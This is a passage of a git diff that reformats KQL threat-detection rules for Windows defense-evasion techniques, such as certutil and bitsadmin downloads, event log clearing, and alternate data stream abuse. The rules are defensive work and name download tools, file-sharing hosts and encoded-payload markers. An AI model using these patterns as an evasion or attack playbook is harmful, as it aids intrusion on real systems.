Detects a code page switch in command line or batch scripts to a rare language -// MITRE Tactic: Defense Evasion -// Tags: attack.t1036, attack.defense-evasion -// False Positives: -// - Administrative activity (adjust code pages according to your organization's region) - -DeviceProcessEvents +// Title: Suspicious CodePage Switch Via CHCP +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2019-10-14 +// Level: medium +// Description: Detects a code page switch in command line or batch scripts to a rare language +// MITRE Tactic: Defense Evasion +// Tags: attack.t1036, attack.defense-evasion +// False Positives: +// - Administrative activity (adjust code pages according to your organization's region) + +DeviceProcessEvents | where (ProcessCommandLine endswith " 936" or ProcessCommandLine endswith " 1258") and FolderPath endswith "\\chcp.com" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql index 32aa93ca..c924af0d 100644 --- a/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql +++ b/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Control Panel DLL Load -// Author: Florian Roth (Nextron Systems) -// Date: 2017-04-15 -// Level: high -// Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 - -DeviceProcessEvents +// Title: Suspicious Control Panel DLL Load +// Author: Florian Roth (Nextron Systems) +// Date: 2017-04-15 +// Level: high +// Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents | where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\System32\\control.exe") and (not(ProcessCommandLine contains "Shell32.dll")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql b/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql index 0e46bca3..03e79ea8 100644 --- a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql +++ b/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql @@ -1,15 +1,15 @@ -// Title: Suspicious Copy From or To System Directory -// Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-07-03 -// Level: medium -// Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. -// Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003 -// False Positives: -// - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) -// - When cmd.exe and xcopy.exe are called directly -// - When the command contains the keywords but not in the correct order - -DeviceProcessEvents +// Title: Suspicious Copy From or To System Directory +// Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-07-03 +// Level: medium +// Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. +// Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) +// - When cmd.exe and xcopy.exe are called directly +// - When the command contains the keywords but not in the correct order + +DeviceProcessEvents | where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS") and (not(((ProcessCommandLine contains "C:\\Program Files\\Avira\\" or ProcessCommandLine contains "C:\\Program Files (x86)\\Avira\\") and (ProcessCommandLine contains "/c copy" and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "\\avira_system_speedup.exe") and FolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql b/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql index 4abcd922..e633f25d 100644 --- a/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql +++ b/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Creation with Colorcpl -// Author: frack113 -// Date: 2022-01-21 -// Level: high -// Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\ -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564 - -DeviceFileEvents +// Title: Suspicious Creation with Colorcpl +// Author: frack113 +// Date: 2022-01-21 +// Level: high +// Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\ +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564 + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\colorcpl.exe" and (not((FolderPath endswith ".icm" or FolderPath endswith ".gmmp" or FolderPath endswith ".cdmp" or FolderPath endswith ".camp"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql b/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql index 76cfacf8..840e5a62 100644 --- a/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql +++ b/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql @@ -1,12 +1,12 @@ -// Title: Suspicious CustomShellHost Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-19 -// Level: high -// Description: Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\Windows\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 -// False Positives: -// - False positives are unlikely, investigate matches carefully. - -DeviceProcessEvents +// Title: Suspicious CustomShellHost Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: high +// Description: Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\Windows\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 +// False Positives: +// - False positives are unlikely, investigate matches carefully. + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\CustomShellHost.exe" and (not(FolderPath =~ "C:\\Windows\\explorer.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql b/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql index abb8f62b..072f8a0c 100644 --- a/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql +++ b/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Diantz Alternate Data Stream Execution -// Author: frack113 -// Date: 2021-11-26 -// Level: medium -// Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.004 -// False Positives: -// - Very Possible - -DeviceProcessEvents +// Title: Suspicious Diantz Alternate Data Stream Execution +// Author: frack113 +// Date: 2021-11-26 +// Level: medium +// Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Very Possible + +DeviceProcessEvents | where (ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql b/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql index 910ba681..e06d1d9a 100644 --- a/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious DLL Loaded via CertOC.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-15 -// Level: high -// Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Suspicious DLL Loaded via CertOC.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: high +// Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL " or ProcessCommandLine contains " –LoadDLL " or ProcessCommandLine contains " —LoadDLL " or ProcessCommandLine contains " ―LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and (ProcessCommandLine contains "\\Appdata\\Local\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Tasks\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql b/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql index b1f14456..2e4cca10 100644 --- a/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql +++ b/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Double Extension Files -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2022-06-19 -// Level: high -// Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.007 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Suspicious Double Extension Files +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2022-06-19 +// Level: high +// Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.007 +// False Positives: +// - Unlikely + +DeviceFileEvents | where (FolderPath endswith ".rar.exe" or FolderPath endswith ".zip.exe") or ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".gif." or FolderPath contains ".jpeg." or FolderPath contains ".jpg." or FolderPath contains ".mp3." or FolderPath contains ".mp4." or FolderPath contains ".pdf." or FolderPath contains ".png." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".rtf." or FolderPath contains ".svg." or FolderPath contains ".txt." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and (FolderPath endswith ".exe" or FolderPath endswith ".iso" or FolderPath endswith ".rar" or FolderPath endswith ".svg" or FolderPath endswith ".zip")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql b/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql index edefc408..285bb01f 100644 --- a/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql +++ b/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Download From Direct IP Via Bitsadmin -// Author: Florian Roth (Nextron Systems) -// Date: 2022-06-28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 - -DeviceProcessEvents +// Title: Suspicious Download From Direct IP Via Bitsadmin +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 + +DeviceProcessEvents | where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql b/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql index 51f3c06c..95235d26 100644 --- a/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql +++ b/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Download From File-Sharing Website Via Bitsadmin -// Author: Florian Roth (Nextron Systems) -// Date: 2022-06-28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file from a suspicious domain -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -// False Positives: -// - Some legitimate apps use this, but limited. - -DeviceProcessEvents +// Title: Suspicious Download From File-Sharing Website Via Bitsadmin +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects usage of bitsadmin downloading a file from a suspicious domain +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 +// False Positives: +// - Some legitimate apps use this, but limited. + +DeviceProcessEvents | where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql index 3f0b508b..e7361697 100644 --- a/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Download Via Certutil.EXE -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-15 -// Level: medium -// Description: Detects the execution of certutil with certain flags that allow the utility to download files. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 - -DeviceProcessEvents +// Title: Suspicious Download Via Certutil.EXE +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: medium +// Description: Detects the execution of certutil with certain flags that allow the utility to download files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents | where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql index 5cd58835..fa0fd3fd 100644 --- a/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Driver/DLL Installation Via Odbcconf.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-23 -// Level: high -// Description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.008 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Suspicious Driver/DLL Installation Via Odbcconf.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-23 +// Level: high +// Description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "INSTALLDRIVER " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql b/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql index 782ca154..485a3e51 100644 --- a/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql +++ b/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql @@ -1,10 +1,10 @@ -// Title: Suspicious DumpMinitool Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-04-06 -// Level: high -// Description: Detects suspicious ways to use the "DumpMinitool.exe" binary -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001 - -DeviceProcessEvents +// Title: Suspicious DumpMinitool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-06 +// Level: high +// Description: Detects suspicious ways to use the "DumpMinitool.exe" binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001 + +DeviceProcessEvents | where ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) and ((not((FolderPath contains "\\Microsoft Visual Studio\\" or FolderPath contains "\\Extensions\\"))) or ProcessCommandLine contains ".txt" or ((ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and (not(ProcessCommandLine contains "--dumpType")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql b/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql index e2e660c4..b9fae231 100644 --- a/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql +++ b/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Environment Variable Has Been Registered -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-20 -// Level: high -// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence - -DeviceRegistryEvents +// Title: Suspicious Environment Variable Has Been Registered +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-20 +// Level: high +// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence + +DeviceRegistryEvents | where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey endswith "\\Environment*" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql b/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql index 9255b130..bf5ff25f 100644 --- a/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql +++ b/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql @@ -1,15 +1,15 @@ -// Title: Suspicious Eventlog Clearing or Configuration Change Activity -// Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2019-09-26 -// Level: high -// Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". -// This technique were seen used by threat actors and ransomware strains in order to evade defenses. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002 -// False Positives: -// - Admin activity -// - Scripts and administrative tools used in the monitored environment -// - Maintenance activity - -DeviceProcessEvents +// Title: Suspicious Eventlog Clearing or Configuration Change Activity +// Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2019-09-26 +// Level: high +// Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". +// This technique were seen used by threat actors and ransomware strains in order to evade defenses. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002 +// False Positives: +// - Admin activity +// - Scripts and administrative tools used in the monitored environment +// - Maintenance activity + +DeviceProcessEvents | where ((ProcessCommandLine contains "clear-log " or ProcessCommandLine contains " cl " or ProcessCommandLine contains "set-log " or ProcessCommandLine contains " sl " or ProcessCommandLine contains "lfn:") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (((ProcessCommandLine contains "Clear-EventLog " or ProcessCommandLine contains "Remove-EventLog " or ProcessCommandLine contains "Limit-EventLog " or ProcessCommandLine contains "Clear-WinEvent ") or (ProcessCommandLine contains "Eventing.Reader.EventLogSession" and ProcessCommandLine contains "ClearLog") or (ProcessCommandLine contains "Diagnostics.EventLog" and ProcessCommandLine contains "Clear")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or ((ProcessCommandLine contains "ClearEventLog" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe")) and (not((ProcessCommandLine contains " sl " and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe")))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql b/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql index 5b5bfe00..410a2762 100644 --- a/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql +++ b/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql @@ -1,11 +1,11 @@ -// Title: Suspicious Executable File Creation -// Author: frack113 -// Date: 2022-09-05 -// Level: high -// Description: Detect creation of suspicious executable file names. -// Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564 - -DeviceFileEvents +// Title: Suspicious Executable File Creation +// Author: frack113 +// Date: 2022-09-05 +// Level: high +// Description: Detect creation of suspicious executable file names. +// Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564 + +DeviceFileEvents | where FolderPath endswith ":\\$Recycle.Bin.exe" or FolderPath endswith ":\\Documents and Settings.exe" or FolderPath endswith ":\\MSOCache.exe" or FolderPath endswith ":\\PerfLogs.exe" or FolderPath endswith ":\\Recovery.exe" or FolderPath endswith ".bat.exe" or FolderPath endswith ".sys.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql b/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql index d0d6b0f7..6ea7768f 100644 --- a/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql +++ b/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Execution of InstallUtil Without Log -// Author: frack113 -// Date: 2022-01-23 -// Level: medium -// Description: Uses the .NET InstallUtil.exe application in order to execute image without log -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Suspicious Execution of InstallUtil Without Log +// Author: frack113 +// Date: 2022-01-23 +// Level: medium +// Description: Uses the .NET InstallUtil.exe application in order to execute image without log +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where (ProcessCommandLine contains "/logfile= " and ProcessCommandLine contains "/LogToConsole=false") and FolderPath contains "Microsoft.NET\\Framework" and FolderPath endswith "\\InstallUtil.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql b/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql index 826d9baa..a5da7450 100644 --- a/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql +++ b/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Extrac32 Alternate Data Stream Execution -// Author: frack113 -// Date: 2021-11-26 -// Level: medium -// Description: Extract data from cab file and hide it in an alternate data stream -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.004 - -DeviceProcessEvents +// Title: Suspicious Extrac32 Alternate Data Stream Execution +// Author: frack113 +// Date: 2021-11-26 +// Level: medium +// Description: Extract data from cab file and hide it in an alternate data stream +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 + +DeviceProcessEvents | where (ProcessCommandLine contains "extrac32.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql b/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql index 920e28f3..45759d1a 100644 --- a/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql +++ b/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql @@ -1,13 +1,13 @@ -// Title: Suspicious File Created Via OneNote 